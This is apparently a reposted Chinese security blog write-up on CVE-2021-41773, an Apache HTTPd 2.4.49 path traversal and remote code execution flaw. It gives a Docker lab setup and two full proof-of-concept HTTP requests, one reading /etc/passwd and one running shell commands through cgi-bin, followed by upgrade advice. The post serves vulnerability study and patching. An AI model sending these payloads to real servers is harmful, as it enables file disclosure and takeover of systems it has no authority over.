CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越以及RCE漏洞

admin 2024年8月6日18:07:50评论23 views字数 1801阅读6分0秒阅读模式

0x00 简介

Apache HTTPd是Apache基金会开源的一款流行的HTTP服务器。

0x01 漏洞概述

2021年10月6日Apache HTTPd官方发布安全更新,披露了CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞。在其2.4.49版本中,引入了一个路径穿越漏洞。在路径穿越目录允许被访问的的情况下,例如配置了 <Directory />Require all granted</Directory>,攻击者可利用该路径穿越漏洞读取到Web目录之外的其他文件。同时若Apache HTTPd开启了cgi支持,攻击者可构造恶意请求执行命令,控制服务器。

0x02 影响版本

Apache HTTPd 2.4.49版本 且穿越的目录允许被访问。

0x03 环境搭建

git clone https://github.com/blasty/CVE-2021-41773

cd CVE-2021-41773

docker-compose build && docker-compose up -d

docker ps 查看镜像所对应端口

CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越以及RCE漏洞

访问ip加8080端口出现如下界面即可

CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越以及RCE漏洞

0x04 漏洞复现

任意文件读取:

访问界面抓包

直接打payloda即可

Poc:

GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: xxx.xxx.xxx.xxx:8080
User-Agent: Mozilla/5.0 (X11; FreeBSD i386 6.73; rv:220.59) Gecko/20100101 Chrome/175.28 OPR/220.59;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 14 Oct 2021 06:00:45 GMT
If-None-Match: "29cd-5ce49cca73d40-gzip"
Cache-Control: max-age=0

CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越以及RCE漏洞

命令执行:

访问界面抓包

Poc:

POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
Host: xxx.xxx.xxx.xxx:8080
User-Agent: Mozilla/5.0 (X11; FreeBSD i386 6.73; rv:220.59) Gecko/20100101 Chrome/175.28 OPR/220.59;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 14 Oct 2021 06:00:45 GMT
If-None-Match: "29cd-5ce49cca73d40-gzip"
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

echo;id

CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越以及RCE漏洞

0x05 修复方式

1、若低于 2.4.49版本,可不升级。

2、若Apache HTTPd为 2.4.49版本,请尽快升级至最新版本。


本文为转载,主要是为了方便翻找。

原文:https://www.cnblogs.com/L0ading/p/15406894.html

原文始发于微信公众号(Glass的网安笔记):CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越以及RCE漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月6日18:07:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越以及RCE漏洞https://cn-sec.com/archives/2007518.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息